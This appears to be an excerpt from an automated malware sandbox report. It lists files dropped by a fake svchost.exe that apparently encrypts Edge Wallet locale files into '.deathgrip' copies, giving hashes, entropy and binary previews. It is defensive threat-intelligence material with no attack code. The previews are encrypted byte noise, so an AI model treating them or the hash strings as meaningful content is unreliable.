                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):843248
                                                          Entropy (8bit):7.9997978703571535
                                                          Encrypted:true
                                                          SSDEEP:24576:fhEa1OQsGxabdhVirhkBqrzoOeliHGKeQ:fhEa10AabZirhVjYKeQ
                                                          MD5:6C1AF408F16729CD2BBB4484BF344700
                                                          SHA1:8F3BBF65D09BA423A0A19D9F8066DD80F7050F19
                                                          SHA-256:DEA524F2ACD484CEE3EBA30B9DA8237B4A7FF0B29466809D93C4E82C6A904F97
                                                          SHA-512:3ECE8466B4A01B4FCB7AD388B4CDD0BD78947493BF62C7511A38B529799534F23453259406D6409B02132A4C6E58E0A9D48C19CF6F31321BD1D098A2B41BDE41
                                                          Malicious:true
                                                          Preview:.............km..W.%9.H..2.x.q...0..a..Pu..<6y.7`s..w..B.txp....d...........Z.......".....o......6....u.u.W\t...<=..@7.)U.I.......].....=B..;j...+D....j.\8..Y.PA...G...8T..m......i..?.....U..p.............LU.........jN.}:.KixQ......}........K.T..+\C8\....=9hK....6..7..7...............1R.DJB...@..T.d..[....UTV1.#.Ol.$.>}0.x.....&.......9..d.....A./..!.l...$.......I.{b$. ..6....v....}.0...n.U.At/....t~~1O..$8m~B......t|.P..|..--d.5.......Pp..9...&k0.>..g...u..g...k.".M.t..^..SL4..a...1....8*.e%........&.o.3.....n&...2].C..^J.......&J....X....F..t..7.....'e..Lhf......G...r1@.[.3..+b\.cl.t....v.H....Q&U.[...?!...........&5..s......(.^..j..W71.PG...Z+.!.-b......>....;....D....$pb.HI....2..r...q.)m....!P.]1b...b:...+.....ZI.....0O.>.D|j8.._[.F..$..c...cH.....8.1i:u.@..w.[S.......@.o>.(.w...y.q..k..j$A|..& ..J.5...j4..t.7h.$.v..b..QPz!...n.8..b...d.&*....p..b.vOP..6..A.M..0.<..|..E.r/0.d....YMw....3#..UQ..Z.N...ECh.&...]....6T....W.K m..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.html

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.html.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.821530265295754
                                                          Encrypted:false
                                                          SSDEEP:24:alaDoWbIwwN03Ys1k4CLkGYKIo2gYXOUIahldCqVbkLrHYjJuYLzQ+szgyy9KYgw:aleowBwerkZLk79o2/hgHkQrzK9KYg0z
                                                          MD5:083F8EEF31782389FEB538A8E73DEBD2
                                                          SHA1:5311BAC7A726C6453DB67C0FE32CE037F8035620
                                                          SHA-256:D365A2B409E713810E773B227883FC81786AA3C534051F452B9532B038C5B2FB
                                                          SHA-512:51E697021269BBA9C182E45658AC27465F97703893E8C215D085314F66FA7B3939CBDB4AFF870166E2A30EDBF3B4A79F11CD0C36F30301F87B6DDA3DB53DEEFD
                                                          Malicious:false
                                                          Preview:........&.&......4..ZC...U,..W%....(C..p..'M{..'e."..X;..L..0..T.....q..9..v....f...P.6........0.CwH....Rd....wO...E~Gb.[.g1.I...o.tj....;XQ.cX..#.4..wmsd....S.....m.d...x..bh6..T..l.i....h.t.....6F4.K...*);.{{......../o$.Q.0z.F..|m.t...'E.<.....}.}....#.....)(^._R..BR7.*/.xK.Eb..(..... .n..xo........&...DF.......Z...}.x..$..m.$'.c.$..h...,r...........>..&>..........5..U2.8..vjj.|.m.EW.q.....|.!.Q.\ZY.....[.#..1.._.Q......w..o8....7/8m)-S-X......\..w....h."..9.....N.\.}...r.d.00d...+..n4u1t.X...l.....R...+.....".3.I.....'.D..._.Fe.t.....y;d.`<"$....9z..V.S..9.c.y.N.y..W..T.~.9H_rL....ko.'~w......N.}1ML{.\.o7.<.V.#...i...<P.....V.?.>~5...r.u0.....iW.....?...Z`..{.I....)5.PX.^.Z...M/t..R...q.1.n...J%.K....v.......DM...;.....1.O....".......y ..dl..`7[...... .VE...]R?ThT?C)..Q!......Y.$.V..../.."....j..T...HJ.c........d.|.t.J...M...rnKTuz"s.......M4^}.y'.U(p..FX...C.].oY.>L.......m..d.......>.O.>...X.l......:...Z@.'..TK.*.<.3.l.O'M.\.....b

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18656
                                                          Entropy (8bit):7.98874943065478
                                                          Encrypted:false
                                                          SSDEEP:384:42GOZ9Q/T3w7BXNNUSBQ0wtpxI8gbL/sOQf4qN/LZ0dsRNp:4jTE7BrwtpqhHsOQf4qJdhH
                                                          MD5:17E749A20618A9FA36E09B8896F9008C
                                                          SHA1:046D79A7F561AD9C9F7EA23101A8F38B80718D98
                                                          SHA-256:C7C4D934299A630813DDC692D50341E695AF449576C0CD00E37E081C2AACCB59
                                                          SHA-512:F9C04A980E651FF14E2A9E163A8465DDD6CDE0CBEE10F04A881379E479ECA4F6A554D6B1499EF3AFE9733495373CB1D9CD3E0385D55644F331C6A5C0F0FEAC9B
                                                          Malicious:false
                                                          Preview:........."Y.....E.. 0h...sud...rY..[.....@...*.....U.AL...@.9.b$".:0&...6q.z..e.."2S.D4....W.)..ca....+ fr..6F..{.T.S.#b..vE*.....<.$..Y..^}t..l>.=-ftdN1K.D.,".W7.s..h.R.:..vw?x@.}..}%.^uiC...:.vW\Yo....a]q!.u._.^.o...ua_^......].J.d...).....$h...S..Io...k1-...ZZ.x..xU...Z....h ...U.PC"...g.......- ..%v..../.:C..#[?..o...LY. 2.(..g...W.j4..(..J.J...i...)]N!...7.!R.)..9*0....!.*c....U.:. Q....A.i?.&............6..-Q..?.v.....Y@Q%Y...T...{.^.(.u....v..I....].F...!.q~..T...z.......n.*.ZlG...I.......w........xe,...M&$..:....?.......|.K.t......U.R...b.....].......y?.+..n.S@..mM.w......C.pW....v\fK.ld...d../W5.$ .5,K..8...J.:....i.yT..-..h#.z.i..&I...@.^4g..b..<.....q]..-$7.*u...Y..U.po|...N.q F#.@y.!.8...i}.1..L..x....i...g..]*...........m/...rT..$...d..Y\...............l...q8(- .3.Y.B.....j.p>%{..R.O.x......9....4.'...(....E.W.....z_.uW...h....|..P.t4jI(B...|}...m...|rW..`.<.{..k..1...i.7.U.....wcx..g.aN...".....%..}~.,.....@[......

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):15360
                                                          Entropy (8bit):7.985727437398473
                                                          Encrypted:false
                                                          SSDEEP:384:zEiXeYKIy9kgUKE4PzO/pJAZENSzMd3BA5YVf/0Uq:YiX9EkrGPzO/opeHVf8D
                                                          MD5:8816D5F96E47D8CBF7E0BDE2DD105EA3
                                                          SHA1:507EE2086616580678FE997EF0E0D403EA5E2E6C
                                                          SHA-256:4E59CAC65F8465AE85F3FD4F25E90B1F2F9F65EAA02E74FAC0898FEB17E1CB92
                                                          SHA-512:534D669E206154B3067912C130A2046E3FB0CFD6F13F50317D86E7D14651C6E4395AF0A6B261094ECDDA442713AA9B8F8C09FD12396BC29A124DA850E8773D13
                                                          Malicious:false
                                                          Preview:...........%.\F.@f.7.`.T.O=0...,.Np.....s.....fc....V.C...........a..,.,......D.S...wZ.....4...&H....`p....Z.O.[. *v.!..."......_ ..t.r..V....yZ...>C..6.8..B85r.......5...e...F...t..F..H....'@.#.V..|2H.Xy$..f..C....(.5O.?l....@6&X......! .5.......b#..'B.=..Dn..1.7..7.WA.sM....*@..)<X.dR.Pn....R..m.p.....s..&w.SgxI..@.i.>.g9+........<%....h...z].......'..6/...4D?..lh.....U .s.T...7....D...x...O.B....:..H).>z...../6]i.Rl .......V.j....J.....8.b....'...V_.x3.b.....lij....,..8.+..c.....h.6..iE.f...hW....'....P..N/....Gvq}..;0...D........%G..C..j.nI{...8]8j'.h.t..)..w .8....q..,..g..>i...P...C.q.W&~[....M9X..?T.;o...%.."`..z..l...7.vu..../$\.uh..6A.._B...c...:X...@.v]..V.y...k ?.0.1:0.....$..tw./]-.^..M...>..R...99C.FNS/b...0..Q.D..rn|cV6......p.w&.2..P..`...%...D0QIAVKi...F.Oxl..R.....EzCfD.(N..av>..YE..N#......8..W....C(........W.A..o#L.....P... ..,.%..y,H.h.%.y.........#.?.6E.......S....w..z....H.,.9......S.!..'.x..g...?....f.......~.....B

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13552
                                                          Entropy (8bit):7.98547957415924
                                                          Encrypted:false
                                                          SSDEEP:384:GImKebLE6gOikNMA647t07BvcHc5LcOkUhaCO86:GIbe438BEBvGwOKaCn6
                                                          MD5:55DFF03D9808BF6F75FE81D2E3F8F33E
                                                          SHA1:E0F25CF001FC47A9C4300929C3B0E6B03F1212F0
                                                          SHA-256:8A58621DB44B99861CF0A37E34A5CF5C31E6F89AA385DAB1CD248CD1519F954C
                                                          SHA-512:00CE545C4A7E400E8A50EC634F126ABA87A8C60BBEC99D9A9765ECE812CA07A2FDAEA0175A2120BD5DC0E16C2E9FF091BFB6530C0D623B9A71A7AA1C8BF017B6
                                                          Malicious:false
                                                          Preview:.........15........I.I......F..&...vX...\..)....o.I.=a.|.G....SJn......._..R.ww..v..Z ,....i.,.....@.5q..-~..(f...(. .roPC..)....in.w..2$..'#......0%...7.F8b.L......z:..Gh9_.Tla.f.#x.a../.7..\.x.......#...1....3|KY5.w..].4J$....G.........z.\j.K.M..........}.;.!......Lj=.h~.B.,%^..]..<.....h...3.. @.4(.@.m@G....1...t?g/.....th..k.x.\.y.)...(IA~.f/.u....r.[.?...MO.N..y;...d^..r~..I....x.......R....>........c..F..Hm..V)..I.1.a..4....A. Zf*..l...T=.&...!H[^.m"..\....&.f.Q..r.PI.D@.h|P9.....y.G..Z.-.9.MC...7.....J......j|.T..].j.F6..j..J..Hqx5.]{......>..j.p..u.!.."...;..!.%..}........1.H.tK.zVR....../#..TP.F.0..E.T.A.h&..KV .A(.H.k...g.O...u....d..u...L..lu.U.j.g.......vf.;F.QR..PA..y...J].P,..aV..bu.....!@..TQ......B....7).``(c...r.`.wq8..~....*F.=..w:..u]z.s.9;..8...$.Q0..uw..H.$.uClW.').<a..X".Y2C.....JgVf28...Zvv...._.V.o...V]u...h@.O.E!...O..@.Y..../.;.0..9."e...{..>^[....5....,......>z.K.%Q.X.X...o2Ssxv...s.t.c.T~......B.....w.9N2.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\es\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\es\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14944
                                                          Entropy (8bit):7.985801698449098
                                                          Encrypted:false
                                                          SSDEEP:384:jvAT9eXmfK3FDfvN658Uu8lRI4sZdMC8/6gm:jc9ImfG5HU5ZRI4wdJ8Xm
                                                          MD5:36A8652CEAFA4921403609CFCA258D00
                                                          SHA1:F53DD7834BF226335198CBEE7EDAFCD2C9FA0747
                                                          SHA-256:DF1BFD7298BAA2C18A2B3AC952B2B2938019186F3783AB477B31D506B14B03A0
                                                          SHA-512:4B689884D996A9633CD06BEDAC470172B7B8B4FD9EE1A2ECB7EE9BB50BD92525404802D19012336833549113D769FDE54510A6FF76F50B71A0B82E84C8FC592D
                                                          Malicious:false
                                                          Preview:.........F.W...28x.S.~)...d_..10.J.=0..;8...t..a2.....29...pK...#_...B.1.E.......jr.+z/...M)z..>.z.....n.Wi...<_..N.....4]r.....k...0...E_K.!.pp...*hl..&....9.T}u..@.CnN}h./...}.D.(Q&%.-2o.;.,.mf....fjHvB..C...<....c*.xo......h..*...'.5...Ny...g.\....0.w......Bi4.".-..CD.M1.|x...#~h....|O...)9..V.'.?.>..lS.............:hL..;.}...9.B..k.z.go....5...iw....D.AP...m..2.&......v..C...T.*...Vey.Y.........E]{[.5..E~r....x.....&.u....MD%..AxL.\...%...eX.79K#...g.\..h...z..~.B...+W..?T... .....;.Yh.`G..rH..!.C.Z./z".7..O.........Z.F.do........Pz$..}Cx.TqY..E.2p....2.D.......C..g..9.ju.c...q^ ).?.5P....Ok.Ba.....[....:.kZ.!t.a.OU...wnm.C1..w.........]}.3..i.).q......n...K.0.t...=...b......<.....=.w.a.m..u..X.....F....g_.>\..lTX..T...yW......{.\.[..B...+O...\.......{WG'A...Ie.....EU.....A.7?..]M.Q...7.F.......z4?.7.M......W/S....>B.....4.&..5......F...;.`.}..j.(.....>.0..vW1.q.<..U.?L..q.../>.j.....M.B.GvxVq.[{...(p.].IX.&F3H.]..B.....Ns

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):15936
                                                          Entropy (8bit):7.988798951224312
                                                          Encrypted:false
                                                          SSDEEP:384:oog13ucYK44ZMfxNpkfZmefGR4bgVwE7A:SYKX2SBfW1A
                                                          MD5:81741548075D54E23219D6BD5813257E
                                                          SHA1:98D44C34FD30308BAA4563E8C659FACDBAABE758
                                                          SHA-256:9CD0594BEF3D5B09B48307B44768F7760C7A890DB53898785D3F3EE81E0E4344
                                                          SHA-512:EAB97A7491F7BE67D9F183A9F3C785F9D3AD14A9FC25D7224F759570745A9634AE89728F4DBA358287C279178B956FA405DD7E8E26E3833768F8A81496C90E63
                                                          Malicious:false
                                                          Preview:........^..s....dj..e.?...RT..M.].[...=.S..E._.,......6z.Q...n..~..i.K...~.1.?.m.[2.$aa...}#...n.W2.o...a.>..8.6......G....@..q.......RnN_.....C,..7.[.9...7..z+.$.]....Q[......p.*+_..._..r}.5./..o......}f...\...].O...d:< MlN.....L......M... 6i}Q......x...>......`.p....Z...*...H.n3.l....]D..^l.G..=....q.R.C/.]M.:F.\m!Zt..NZ.w'.cR.....r.....UU....&.....0j@ .=V.y..>^w..$|.._.)......gY".....8....7K.f...M..4#.^.'Lxi...Z.....x).C=LD...._v.....;.4.5...c..'..<.y.....l...Vpq..:.2M..............`.[...H.....e0.A.SC...c.sc....=.~C..*8...i/J.2q._n..2!....L..DT.o,......b........&.FY.%..z....(.......{0If..7b..G./U.CO....m..?.g..$Z.\..B].ta.......q,+.s....}...|.%4.f..tg.r....{@.....;e:0dm....z.Y..m......s........+.qy.h...R.C..P.!.}p}....Q...;...6[....A...:91.....h....r./.)..-....#.sp.t@*........&....7?.>l...=}<.?..$.)`k./..x...Y.C.|.%. 6.*Hv.,.X.)`l...@.M......V...DA9....Q{....Z@.@.......s...*S........j}.~..Q@.g|.%...?.d..k....Q......3.bUc..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):15920
                                                          Entropy (8bit):7.988250623309588
                                                          Encrypted:false
                                                          SSDEEP:384:Bpqpjt9G2UoWRrwFEcF42VlnCcvoCC7MbXA/OCeuLO:BpOjt9G2UhejF42TC1CC40/OELO
                                                          MD5:57A58AE6A6D7D67CF58352CA244247F4
                                                          SHA1:B17778B9C10F3C03D1C91B0579033499225F12E5
                                                          SHA-256:233DD4CF00D853993F3BCCD69DC7B6881FFE2396A429DCD61016028D6DC774E6
                                                          SHA-512:2007738DFFFD5574B11B4A95EA1B218A943AFB7428EE602456AD320956B5EC96CD9D962AC91CDC026A4DCDCBA92F57BF03677641C797DDF2BCC4CA6F3CC61EF4
                                                          Malicious:false
                                                          Preview:..........~....%.......&.....o...6..9......#....i.y,.9.i....S....'.H...lN.......\c.......?..}h.......Z....".k}...-x....<$....l...P...t.ED....I4...\S......C.Ga..gYZ.I..p.cao.q.n.......r.....;Dy..b,.eICP.5^.........'~GT....CH;.\.B....[...?....Z).4,./....n.hT.a..9.?...=.w>.+yv6&\.[..3...L.Y...ZJ.....X..p...71.v.......\."j.X.(......}...+..p.....|..O.HH.ah...Y..)...%".x+.Nz.O0\q*..r.q`..q...}...u.../..I...=.*..\....b.{b..<t...|......s.^....*.H.@a{}...t.].......P...E....Z......y.m..K%."z-9Y/...3.ry...'...u.D7O....`..~...A8.4.....ZN3..#]..Y.^d..b.T.).H...1!.u2R...qB..}5H........RF.+...%.s.7%.'.....}GQW.i....6.6..P'C,.....,.V.W:j....%.w.c.f.1..'...zy....g.6...s.=9..A'......Yk.....i..P..../_..P......2....0.i.mB.y|..c.e..x..o.2...:,....vA..F...(.:T.>.......hW..Nu~..h....,zUJ..l..:k.-....1..A/j...j-.3.F.-F.B..' ..-.+...E.$....+u.O...a...%i;T....9PQ..Y.....2........)..vL...)%..M..^... Es...EG*R...U6xF.~'.sh..i..._..vx.Q'...M..O.....r..'3.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\id\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\id\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14512
                                                          Entropy (8bit):7.985961578069724
                                                          Encrypted:false
                                                          SSDEEP:384:3tX2Hz9K9mJafQbj5IVlNsuMNOUH7JobXRh9x8:30Hz9K4eyj5QcBwRh9x8
                                                          MD5:3777F59CFFE9276A556E5B234C38795A
                                                          SHA1:324F5841A25054466ABAC6A0C50FCD1D6142B839
                                                          SHA-256:31B111F61BED7D2809DA1696B85F6C64BDEE5651183056A33E92CF113071E7DB
                                                          SHA-512:0A32067A76EFBB84276BD64BE0D7FA055459E3F04636EF2CF35FCF65858C1A406D50C44F8D3AA37AD07FD32A1152323F6BD9AA88B9D5E5DD706A5A322DC8DD28
                                                          Malicious:false
                                                          Preview:........U...]./..Q.IY-.m..........I.wk/o.au.@.6.w..T..9"L0.uy ....>.R''...}efS..?....T..K.P.M..J..%.i.F.......z.mTs..5......vb....+@@!9.PQw.@.......n.k.1.XZ.K..k].K...v?.IY........Z....F.m^td.._j....J..."..5..z..a.L.,KXo..^.m.C..Q_88....[.........Nn..V~.E_!..*........Uz.......5..z..x....%..(Z..CT...wgH$$....5.] ...\.E.S5..............q&..H..k..S.-..ur.......PZq.$&K...I.r..*..-.6p95.....Q.....3].2..W........h@.YX.ig.enP.m.ZO...79.+..`.].YX...;...r.Y.b'+.-u...52c..p.4..x.Q..u.o.>_r\.....&.V...Q:dqq..[.....%.8...E.k$.8$.=1..d...(...\...9..Jm.+u......r.$..z...V.{../D.^. @....=.%.p.~.g.........E...+}"{.U>....WhD...1..:...x..".G..nX.!.."kG...............y..v...6....;.Y...!hD...n..f..........|m.I..HmC(.hcV.5.2..Nv5.....(2.^.#...sSX...Y!....,..=..D....\..Q......Z.sm..g..".Z^...kX-.1g.g.ygx....C....x.|.....t.....{..0.y..]..M.."7.{.B.8@......q.......4_.....B..b.x/.D2.........{...-...ds.....DjR.r...M......a/._O....Y......=?.~A~....K.......d....L.c

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\it\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\it\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14960
                                                          Entropy (8bit):7.986101629887228
                                                          Encrypted:false
                                                          SSDEEP:384:ngNd8cw0Erlfvgq7Nd+KO20tkWIHC/3laIrmFhZ5qu7SoW+8kK:2utlHLbAaWgC/3laIrmJ1S8E
                                                          MD5:9C7DD4E60E0C2DBBAD8EFC36AF13E741
                                                          SHA1:959B9AE93307927E787B785311B4E59B1A7B5EF7
                                                          SHA-256:3AFA38D90E510320AED00F006BD635B3611F0B507F59CA3127593799A07721EF
                                                          SHA-512:C0C962D211D00A50E6F03FD169E7E4D614278BE66A835758840801F7E91351D7DA5B7A9EC3A694223450F5BF04F4EEC445DAF68568B4C9434398F7120BB480A7
                                                          Malicious:false
